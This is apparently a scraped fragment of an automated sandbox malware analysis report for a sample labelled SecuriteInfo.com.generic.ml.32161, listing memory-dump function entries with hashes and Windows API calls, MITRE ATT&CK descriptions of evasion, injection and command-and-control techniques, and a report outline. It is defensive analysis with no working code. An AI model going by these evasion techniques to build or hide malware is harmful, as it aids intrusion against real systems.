Source File: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Offset: 02AD1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 70ee19faf69bf8dcc6a4a3f873ce1ffa53342b63fe5b5a5b4ee120b7c7b578cc
Instruction ID: 405c636b39d45e56f6e39eef1d51dc86ee0e70cb789a0ddad14cd1c9e0c4d8e0
Opcode Fuzzy Hash: 70ee19faf69bf8dcc6a4a3f873ce1ffa53342b63fe5b5a5b4ee120b7c7b578cc
Instruction Fuzzy Hash: ADD0A7A838011D574B003A7476905FC2762AE086917248163F85388010DE348C498F86

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3D90, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02AD3D0E,02AD3E13), ref: 02AD3DE3

Memory Dump Source

Source File: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Offset: 02AD1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3ce9ff1ffd66f75b6be24c1a5c9ba84a3290a7a9bf65a249ed41fd5d7d2f9300
Instruction ID: 5f09fbac01cb7ba3f97aa025c117191ab66be8a8e0ce08134aaecb0ea0b54290
Opcode Fuzzy Hash: 3ce9ff1ffd66f75b6be24c1a5c9ba84a3290a7a9bf65a249ed41fd5d7d2f9300
Instruction Fuzzy Hash: 67D0C930794301BDFB2049515E86FA626255B50F41F1044593F876A0C09AA01A50CD17

Uniqueness

Uniqueness Score: -1.00%

Function 02AD4755, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD475C

Memory Dump Source

Source File: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Offset: 02AD1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3f20a572027992af05b79d2906a744c277c7c99a437c4ed696636dc80dd11ce5
Instruction ID: 8ef0e1b077a7aa650694f60e8da7fead052e4e7b7a3b5db011de33c73162f7f3
Opcode Fuzzy Hash: 3f20a572027992af05b79d2906a744c277c7c99a437c4ed696636dc80dd11ce5
Instruction Fuzzy Hash: B2C08C30404209EB8F001F608D4C9DB3A7DAF45781B448000FC0B85000CB70CD04C620

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3DB5, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02AD3D0E,02AD3E13), ref: 02AD3DE3

Memory Dump Source

Source File: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Offset: 02AD1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37c48656ae8e70676fdca83e8e06e366e042f9b854029efcc663c5a9fc032676
Instruction ID: 239b75c8ecb9b637371cdab78bd9e1ee68bb2fc31a0c76ab6c97e3fd11b27a05
Opcode Fuzzy Hash: 37c48656ae8e70676fdca83e8e06e366e042f9b854029efcc663c5a9fc032676
Instruction Fuzzy Hash: CEC012B186121ADAEA30BA008D40B827222AB10B00F6204A8AA117B201A6311818CA26

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.generic.ml.32161

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 004012D4, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1041
COMMONCrypto